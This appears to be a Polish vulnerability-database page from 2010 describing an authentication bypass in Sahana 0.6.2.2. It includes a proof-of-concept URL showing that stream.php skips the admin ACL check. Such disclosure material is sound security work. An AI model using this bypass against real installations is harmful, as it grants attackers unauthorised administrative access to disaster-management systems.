Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa

Rejestracja | Zapomniałem hasła | Zaloguj się

	SecurityReason
Wiadomości IT

Dodaj wiadomość

Szukaj

Baza SecurityAlert

O SecurityAlert

Baza ExploitAlert

Badania SecurityReason

	WLB
Baza WLB

Dodaj Note WLB

O WLB

	Audyt
Informacje

Harmonogram

Cena

Referencje

Kontakt

	RSS
Wiadomości

SecurityAlert

ExploitAlert

Apache

PHP

WLB

	Zespół
Kontakt

Informacje o firmie



	Informacja
Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu: secalert(.)securityreason(.)pl Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres: exploit(.)securityreason(.)pl

Strona główna

Baza WLB

Tytuł :	Sahana 0.6.2.2 authentication bypass
WLB :	WLB-2010030081 (Szczegóły)

SecurityAlert : 7203

Data publikacji :

2010-03-19

Autor : nill

Poziom ryzyka : Wysoki Poziom Wysoki

(Szczegóły)

Zdalny błąd : Tak

Lokalny błąd : Nie

Status : Bład

Historia :
[2010-03-19] Publikacja

Podatne oprogramowanie :

Sahana 0.6.2.2

Tekst :

Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.

Referencje :

None

Jeżeli chcesz zmienić powyższą note, prosze użyj UCP

	Apache
» Apache HTTP Server Denial of Service Vulnerability

» Multiple Vendors libc/fnmatch(3) DoS (incl apache poc)

» Apache Continuum cross-site scripting vulnerability

» Apache Tomcat DoS Vulnerability



	PHP
» PHP Hashtables Denial of Service

» PHP 5.3.6 multiple null pointer dereference

» PHP 5.3.6 ZipArchive invalid use glob(3)

» libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)



	Patronat
Szkolenia ISecMan

Szkolenia Multitrain